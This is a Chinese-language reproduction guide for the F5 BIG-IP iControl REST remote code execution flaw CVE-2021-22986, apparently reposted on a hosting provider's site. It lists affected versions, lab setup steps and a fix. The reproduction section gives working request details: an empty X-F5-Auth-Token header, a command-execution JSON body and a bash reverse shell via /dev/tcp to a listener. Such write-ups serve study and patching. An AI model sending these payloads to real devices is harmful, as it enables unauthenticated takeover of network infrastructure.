F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析
F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析
这期内容当中小编将会给大家带来有关F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。
0x00简介
F5 BIG-IP 是美国“F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。
0x01漏洞概述
F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。
0x02影响版本
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 6.0.0-6.1.0
0x03环境搭建
1、 本次漏洞环境使用F5 16.0.0版本进行搭建,F5下载地址:
https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.0
2、 注册一个F5账号,访问下载链接,选择相应版本进行下载并同意条款
3、选择VMware格式的下载文件,然后选择下载地区这里选择离得近得下载即可
4、下载完成后,使用VMwear导入安装
VMwear左上角‘文件’->‘打开‘选择下载好的文件
5、选择同意许可,选择安装位置
6、配置方面看自己的选择导入后启动即可系统默认账户:root/default登陆后需要修改默认密码
7、配置完成后打开虚拟机输入初始密码,会提示修改密码 //需要修改强密码
8、修改完成密码后输入config设置IP
9、在浏览器访问此地址需要使用https://your-ip
10、登陆账号为admin登陆密码为之前虚拟机设置得密码,登陆之后需要修改一次密码 需为强密码
0x04漏洞复现
1、首先访问以下url,然后使用Burp进行抓包并发送到Repeater(重放)模块
https://your-ip/mgmt/tm/util/bash
2、修改数据包GET为POST并在添加上X-F5-Auth-Token字段和Authorization
X-F5-Auth-Token字段值为空
Authorization: Basic YWRtaW46QVNhc1M= 后面使用basse64加密了解码出来为admin:ASasS
3、在包内添加以下代码执行命令,查看id,添加完成后发送包
{"command":"run","utilCmdArgs":"-c id"}
4、既然可以执行命令,来反弹shell,使用kali监听
{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/172.16.1.127/7765 0>&1'"}
0x05修复方式
1、建议将F5 BIG-IP / BIG-IQ 升级至安全版本。
上述就是小编为大家分享的F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注高防服务器网行业资讯频道。
[微信提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。
[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]
[